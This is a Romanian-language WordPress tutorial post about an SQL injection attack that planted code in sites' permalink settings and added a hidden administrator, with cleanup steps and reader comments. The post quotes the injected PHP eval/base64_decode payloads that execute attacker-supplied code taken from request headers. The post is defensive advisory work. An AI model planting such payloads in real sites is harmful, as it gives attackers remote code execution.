Tutoriale WordPress de încredere, atunci când aveți cea mai mare nevoie.
Ghidul începătorului pentru WordPress
Cupa WPB
25 de milioane+
Site-uri web care folosesc plugin-urile noastre
16+
Ani de experiență WordPress
3000+
Tutoriale WordPress de la experți

Inspecție SQL WordPress – Cel mai recent atac

Multe site-uri sunt afectate de un atac SQL recent, prin care coduri sunt injectate pe site-ul dvs. Această injecție MySQL afectează permalink-urile dvs., făcându-le ineficiente. Ca urmare, URL-urile postărilor dvs. de pe blog nu vor funcționa. Numeroase bloguri WordPress au fost vizate în acest atac. Mulțumită lui Andy Soward pentru că ne-a adus acest lucru în atenție.

Unul dintre următoarele coduri a fost adăugat la structura permalink-urilor dvs. din cauza acestui atac:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Aceste ghilimele au adăugat toate permalink-urile pe site-ul dvs. și pot fi modificate doar dacă sunt eliminate manual.

Pentru a remedia acest lucru, accesați:

Setări > Permalink-uri și elimină codul de mai sus și înlocuiește codul implicit.

Următorul pas este să accesați Utilizatori. Veți vedea că există mai mult de un administrator. Nu veți vedea numele lor listat, dar veți vedea numărul crescut. Deci, ceea ce trebuie să faceți este să priviți toți utilizatorii și să găsiți ultimul care s-a înregistrat. Plasați mouse-ul peste acel utilizator și obțineți linkul. Schimbați codul userid= adăugând 1 la acel număr. Deci, dacă ultimul utilizator pe care îl puteți vedea a fost utilizatorul #2, adăugați 1 la el și faceți-l 3. Ar trebui să găsiți că administratorul ascuns are un cod ciudat ca prim nume. Ștergeți codul și faceți-l un abonat. Apoi reveniți și ștergeți-l.

Acest lucru ar trebui să rezolve problema. Îl puteți șterge și pur și simplu accesând PHPMyAdmin. Deoarece veți vedea utilizatorul acolo.

Am vrut doar să facem aceste știri publice cât mai curând posibil, astfel încât utilizatorii noștri să poată fi informați. Vă rugăm să vă asigurați că verificați dacă blogul dvs. nu este infectat. Sperăm că WordPress va lansa o actualizare curând.

De asemenea, dacă nu ați implementat unele dintre aceste măsuri pentru a vă securiza Zona de administrare WordPress.

Dezvăluire: Conținutul nostru este susținut de cititori. Acest lucru înseamnă că dacă faceți clic pe unele dintre linkurile noastre, este posibil să câștigăm un comision. Vedeți cum este finanțat WPBeginner, de ce contează și cum ne puteți susține. Iată procesul nostru editorial.

Cel mai bun instrumentar WordPress

Obține acces GRATUIT la instrumentarul nostru - o colecție de produse și resurse legate de WordPress pe care fiecare profesionist ar trebui să le aibă!

Interacțiuni cu cititorii

8 CommentsLeave a Reply

  1. Baza de date a site-ului meu a fost infectată acum câteva zile, adăugând caractere și cuvinte ciudate după fiecare URL de postare sau pagină. Nu am putut găsi nimic ciudat în setări: permalinks sau în meniul utilizatori. Ce pot face pentru a rezolva această problemă, vă rog? Compania mea de găzduire are o copie de rezervă a bazei de date infectate!

  2. Am fost lovit de asta de două ori.

    prima dată a fost o injecție SQL în pluginul wassup, de data asta nu sunt sigur. furnizorul meu de hosting m-a blocat.

    odată ce îmi vor restaura contul, voi elimina wordpress.. M-am săturat!

    • Apreciem foarte mult acest comentariu, problema nu a fost cu WP Super Cache, credem că a fost pluginul numit WP External Link. Am dezinstalat și reinstalat WP-Super Cache de două ori, apoi am comparat serverul de dezvoltare unde totul a funcționat bine. Diferența a fost acest plugin. Când am eliminat acel plugin, a funcționat. Puteți acum să citiți acea postare.

      Admin

      • Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Oh, citesc!
        Mulțumesc mult!

Lasă un răspuns

Vă mulțumim că ați ales să lăsați un comentariu. Vă rugăm să rețineți că toate comentariile sunt moderate conform politicii noastre de comentarii, iar adresa dvs. de e-mail NU va fi publicată. Vă rugăm să NU folosiți cuvinte cheie în câmpul nume. Să avem o conversație personală și semnificativă.